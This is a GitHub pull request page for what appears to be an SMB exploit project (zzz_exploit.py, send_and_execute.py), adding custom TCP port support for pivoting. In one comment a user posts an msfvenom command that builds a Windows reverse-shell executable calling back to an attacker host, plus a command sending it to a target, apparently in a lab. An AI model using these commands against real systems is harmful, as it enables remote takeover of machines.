-
Notifications
You must be signed in to change notification settings - Fork 1.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Adding suport to custom tcp port #35
base: master
Are you sure you want to change the base?
Conversation
using zzz_exploit.py, victim >> pwned.txt created successfully |
Same error, has anyone solved it? |
Hey, msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.30 LPORT=8888 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.16.30_8888.exe python send_and_execute.py 10.129.235.221 rev_10.10.16.30_8888.exe Trying to connect to 10.129.235.221:445 How can I fix this? |
I added support to custom TCP port, it is very usefull in case of port fowarding and pivoting.
My Best Regards.